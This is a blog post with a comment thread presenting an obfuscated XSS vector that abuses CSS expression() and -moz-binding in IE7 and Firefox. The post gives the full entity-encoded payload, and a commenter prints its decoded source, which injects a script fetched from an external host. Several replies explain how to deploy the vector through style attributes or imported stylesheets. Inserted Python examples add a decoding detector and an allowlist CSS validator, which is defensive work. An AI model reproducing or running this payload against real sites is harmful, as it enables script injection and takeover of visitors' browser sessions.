# Ultimate XSS CSS injection

Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector is based on the brilliant work of Martin, which I modified slightly; in doing so I found that IE will also accept HTML entities inside CSS styles.

### Credits update

The expression part of this technique was first demonstrated by Dan on the slackers forums. Nice one Dan, and sorry for missing you from the credits.

```html
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);&#x78&#x78&#x3A&#x20&#x65&#x5C
&#x78&#x70&#x5C&#x72&#x65&#x5C&#x73&#x5C&#x73&#x5C
&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x28&#x77&#x69&#x6E
&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20
&#x3F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D
&#x53&#x74&#x72&#x69&#x6E&#x67&#x2E&#x66&#x72&#x6F
&#x6D&#x43&#x68&#x61&#x72&#x43&#x6F&#x64&#x65&#x3B
&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65
&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45
&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31
&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C
&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31
&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65
&#x74&#x41&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65
&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x31&#x31&#x34
&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x31&#x30&#x34
&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31
&#x31&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34
&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x37&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30
&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30
&#x2C&#x31&#x30&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34
&#x36&#x2C&#x39&#x39&#x2C&#x31&#x31&#x31&#x2C&#x34
&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x37&#x2C
&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C
&#x39&#x38&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C
&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31
&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C
&#x31&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B
&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x67
&#x65&#x74&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x42
&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x35
&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31
&#x30&#x31&#x2C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20
&#x29&#x29&#x2E&#x61&#x70&#x70&#x65&#x6E&#x64&#x43
&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x29&#x3B
&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31
&#x3B&#x27&#x29 : 1);" id="inject">test</div>
```


Please use my tool Hackvertor if you need to decode the IE vector, as it provides all the necessary conversions. Note that the vector has been broken up onto multiple lines for viewing purposes; remove the line breaks when testing it.
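As an added illustration (not code from this post and not Hackvertor), here is a small Python normalizer that decodes a style attribute in the same order a browser does before its CSS parser runs, then checks for the two constructs the vector relies on. It shows why a substring filter on the raw attribute sees nothing: the HTML entities and the CSS backslash escapes each hide the identifiers on their own, and both layers have to be undone before `expression(` or `-moz-binding` is visible. The sample style string, the `example.invalid` host and the function names are constructed for this example and are not from the post.

```python
"""Decode a style attribute the way the browser does before its CSS parser
runs, then look for the two constructs the vector above relies on."""
import html
import re

# CSS escape: backslash + 1..6 hex digits (plus one optional whitespace), or
# backslash + any other character, which simply yields that character.
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\(.)", re.DOTALL)
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
_WHITESPACE = re.compile(r"[\s\x00]+")

# The constructs demonstrated in the post, matched against the decoded value.
DANGEROUS = ("expression(", "-moz-binding")


def _unescape_css(value: str) -> str:
    def repl(m):
        if m.group(1) is not None:
            cp = int(m.group(1), 16)
            return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"
        return m.group(2)
    return _CSS_ESCAPE.sub(repl, value)


def normalize_style(raw: str) -> str:
    """Apply the decoding layers in the order the browser applies them."""
    # 1. The post splits the vector over several lines for display; a real
    #    payload is delivered as one line, so join it back up first.
    value = raw.replace("\r", "").replace("\n", "")
    # 2. HTML attribute parsing decodes character references, including the
    #    semicolon-less &#x.. form the IE half of the vector is written in.
    value = html.unescape(value)
    # 3. The CSS tokenizer resolves backslash escapes inside identifiers.
    value = _unescape_css(value)
    # 4. Comments and whitespace only separate tokens; drop them and
    #    lower-case so the comparison is case-insensitive.
    value = _CSS_COMMENT.sub("", value)
    value = _WHITESPACE.sub("", value)
    return value.lower()


def find_dangerous_css(raw: str) -> list[str]:
    """Dangerous constructs present once the attribute is fully decoded."""
    normalized = normalize_style(raw)
    return [token for token in DANGEROUS if token in normalized]


def naive_check(raw: str) -> list[str]:
    """What a plain substring filter on the raw attribute sees."""
    return [token for token in DANGEROUS if token in raw.lower()]


# Constructed sample modelled on the vector in the post: the -moz-binding half
# uses CSS backslash escapes, the expression() half is hex-entity encoded.
# example.invalid is a placeholder host, not the URL from the post.
SAMPLE_STYLE = (
    r"\-\mo\z\-b\i\nd\in\g:\url(//example.invalid/xbl.xml#xss);" "\n"
    "&#x78&#x78&#x3A&#x20&#x65&#x5C&#x78&#x70&#x5C&#x72&#x65&#x5C\n"
    "&#x73&#x5C&#x73&#x5C&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x31&#x29"
)
BENIGN_STYLE = "color: #abc; background: url(/img/bg.png)"

if __name__ == "__main__":
    print("naive filter sees :", naive_check(SAMPLE_STYLE))        # []
    print("decoded attribute :", normalize_style(SAMPLE_STYLE))
    print("after normalizing :", find_dangerous_css(SAMPLE_STYLE))
```

The decoding order is the point: entity decoding belongs to the HTML attribute parser and happens first, backslash escapes belong to the CSS tokenizer and are resolved afterwards, so a filter that only does one of the two, or does them in the other order, still misses this vector. This is a detector for logging and review, not a sanitizer; the fix for user-controlled styles is a real CSS parser with an allowlist, not a longer blocklist.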

### 28 Responses to “Ultimate XSS CSS injection”

1. .mario writes:

here are the sources

```css
xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;
scr=document.createElement(x(115,99,114,105,112,116));
scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,98,117,115,105,110,101,115,115,105,110,102,111,46,99,111,46,117,107,47,108,97,98,115,47,120,115,115,47,120,115,115,46,106,115));
document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);
window.r=1;') : 1);
```

n1

2. Gareth Heyes writes:

Hackvertor can now reconstruct this attack using the tag XSS->mozbindingexpression

and even add the backslashes for you
Filter evasion->backslashesc

3. Marco Ramilli writes:

Very interesting,
another great Job Gareth !!

4. Vinicius K-Max writes:

wow!
very nice work

5. Eliena Andrews writes:

how do you use this code for xss ?

Eliena

6. Gareth Heyes writes:

You need to remove the line breaks and the code requires an id="inject" to work on IE7. It can be injected within most HTML tags using the style attribute.

7. John Cantor writes:

So, its main advantage is on sites that filter “script” tags. You still need to pass “<” and “>” right?

8. Gareth Heyes writes:

Nope you don’t need “<” or “>” to use this injection, you just need a style attribute to inject.

9. DoctorDan writes:

Many thanks for the credit for the window.r trick. I hope I didn’t sound like I was specifically asking for credit on slackers; I was just trying to find out if I had come across the same trick as someone else or if it was an original idea. Nonetheless, I really appreciate the mention!

And damn, is that fine or what?! Nice work with that injection. A beautiful thing…

-Dan

10. Gareth Heyes writes:

Hey Dan no probs you contributed to the above vector so you deserve credit

12. Gareth Heyes writes:

LOL!

13. no.connexion writes:

Can you please show us the source of this xss before it was “hackvectoreted”. I guess that’s here there but I just don’t find any way to reverse it.

Thanks
PS. Nice work you guys

14. no.connexion writes:

Found some interesting thing here regarding this matter: hxxp://www.seo-blackhat.com/xss-cheat-sheet/

15. no.connexion writes:

Sorry for the mess but don’t know to edit my post | guess that’s HEX there but I just don’t find any way to reverse it. |*

16. Gareth Heyes writes:

@no.connexion

Hackvertor can also decode data you know 😉

Hackvertor also has XSS tags which allow you to construct this vector, goto Hackvertor->XSS->mozbindingexpression

17. no.connexion writes:

Thanks for the answer. Is it possible to use this XSS through a CSS file? What I’ve tried to do is to insert <link href="hxxp://wwwexample.com/css/xss.css"> and then <div class="somename" style="" id="inject">test</div> in the HTML, and the xss.css should look like <<< .sometext {
} >>>

or maybe something like that: body {
}

None of the above worked … maybe I’m doing something the wrong way or it’s just not going to work.

18. Gareth Heyes writes:

@no.connexion

Yeah it’s possible to use it through a CSS file. In the file you need to define the rule as :-

```css
body {
/* code here */
}
```

Then simply insert as a normal CSS through link or @import

19. no.connexion writes:

Thanks for response.
Here are my final thoughts.

```html
<style type="text/css">
@import url(http://www.example.com/css/test.css);
</style>
<body>
<b> This IS a test </b>
</body>
```

and the in test.css:

b

{
}

OR

in test.css
b

{
}

AND it works fine for Firefox but IE70 does nothing. I’m using 7.0.5730.13.

20. Gareth Heyes writes:

@no.connexion

Dude you need to run “convert” in Hackvertor first before adding it to the page.

21. no.connexion writes:

I guess I was using the converted version in my css here:
b

{
}

I didn’t use all the converted code for obvious reasons. Can you please confirm that you’ve done this through css and it works ? If yes I’ll stop asking and I’ll work my ass to make this work.

22. Gareth Heyes writes:

Yep tested on IE and Firefox

23. no.connexion writes:

Please take a look in here:
hxxp://noconnexion.wordpress.com/

24. yasir writes:

coo000lllL :::::::: good work

25. Vinicius K-Max writes:

Firefox 3 fixed this xml hole?

26. Gareth Heyes writes:

Yeah it’s fixed in FF3 final, I think the beta it was still in but they removed it

I thought it was possible to do it inline but Giorgio mentioned it’s only available in chrome

27. sim writes:

How can you stop people from writing these types of attacks to a CSS file when allowing people to write their own CSS files on your server?

28. Gareth Heyes writes:

@sim

Validate the CSS using a CSS parser like anti-samy
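The allowlist approach recommended in that last reply, as an added example that is not part of the thread and is not AntiSamy: a Python validator for user-uploaded stylesheets that accepts only known properties with a narrow value grammar and rejects everything else, including every at-rule (the thread's @import delivery included). The escaped spellings from the post fail simply because they do not equal an allowlisted property name and contain backslashes and parentheses the value grammar never admits, so no decoding step is needed. The property list, regexes, sample sheets and the `example.invalid` host are constructed assumptions for this example.

```python
"""Allowlist validation for user-supplied stylesheets: accept a small set of
properties and value shapes, reject everything else."""
import re

# Properties a user theme is permitted to set; everything else is rejected.
ALLOWED_PROPERTIES = {
    "color", "background-color", "background-image", "font-family",
    "font-size", "font-weight", "text-align", "margin", "padding",
    "border", "width", "height",
}

# Plain values: keywords, numbers with units, hex colours, comma lists.
# No parentheses, quotes or backslashes, so expression(...) and escaped
# identifiers cannot pass regardless of how they are spelled.
_SIMPLE_VALUE = re.compile(r"[-A-Za-z0-9#%.,\s]+")
# url() values: same-origin absolute paths only; "//host" and schemes fail.
_SAFE_URL = re.compile(r"url\(\s*/[-A-Za-z0-9_./]*\s*\)")
# Selectors: element, class, id, pseudo-class and combinators, nothing escaped.
_SELECTOR = re.compile(r"[-A-Za-z0-9_.#:,> ]+")
_RULE = re.compile(r"([^{}]*)\{([^{}]*)\}", re.DOTALL)


def _value_ok(prop: str, value: str) -> bool:
    if _SIMPLE_VALUE.fullmatch(value):
        return True
    return prop == "background-image" and _SAFE_URL.fullmatch(value) is not None


def validate_user_css(css: str) -> list[str]:
    """Return the list of violations; an empty list means the sheet is accepted."""
    violations: list[str] = []
    # At-rules (@import, @charset, ...) can pull in or reinterpret content the
    # validator never sees, so any of them rejects the whole sheet.
    if "@" in css:
        violations.append("at-rules are not allowed")
    # Anything left over once every selector { ... } block is removed is
    # stray text that a lenient browser might still parse; reject it.
    leftover = _RULE.sub("", css).strip()
    if leftover:
        violations.append(f"unexpected text outside rules: {leftover[:40]!r}")
    for m in _RULE.finditer(css):
        selector, body = m.group(1).strip(), m.group(2)
        if not _SELECTOR.fullmatch(selector):
            violations.append(f"selector not allowed: {selector!r}")
        for decl in body.split(";"):
            decl = decl.strip()
            if not decl:
                continue
            prop, sep, value = decl.partition(":")
            prop, value = prop.strip().lower(), value.strip()
            if not sep:
                violations.append(f"malformed declaration: {decl!r}")
            elif prop not in ALLOWED_PROPERTIES:
                violations.append(f"property not allowed: {prop!r}")
            elif not _value_ok(prop, value):
                violations.append(f"value not allowed for {prop}: {value!r}")
    return violations


# Constructed samples: an ordinary user theme, the shape of the vector from
# the post with a placeholder host, and the @import delivery discussed above.
GOOD_CSS = """
body { color: #333; font-family: Arial, sans-serif; }
.panel { background-image: url(/themes/bg.png); padding: 4px 8px; }
"""
BAD_CSS = (
    r"body { \-\mo\z\-b\i\nd\in\g:\url(//example.invalid/xbl.xml#xss);"
    r" xx: e\xp\re\s\s\i\o\n((window.r!=1) ? 1 : 1); }"
)
IMPORT_CSS = "@import url(http://example.invalid/test.css); b { color: red; }"

if __name__ == "__main__":
    for name, sheet in (("good", GOOD_CSS), ("bad", BAD_CSS), ("import", IMPORT_CSS)):
        print(name, validate_user_css(sheet) or "accepted")
```

Everything the validator does not understand is a rejection, which is what makes an allowlist robust against encodings nobody thought of: a new obfuscation of `expression` does not need a new rule, because it still is not `color`. The grammar here is deliberately tiny; a production deployment wants a real CSS parser (the reply above names AntiSamy) so that legitimate values such as `rgb()` or shorthand borders can be admitted on purpose rather than by accident.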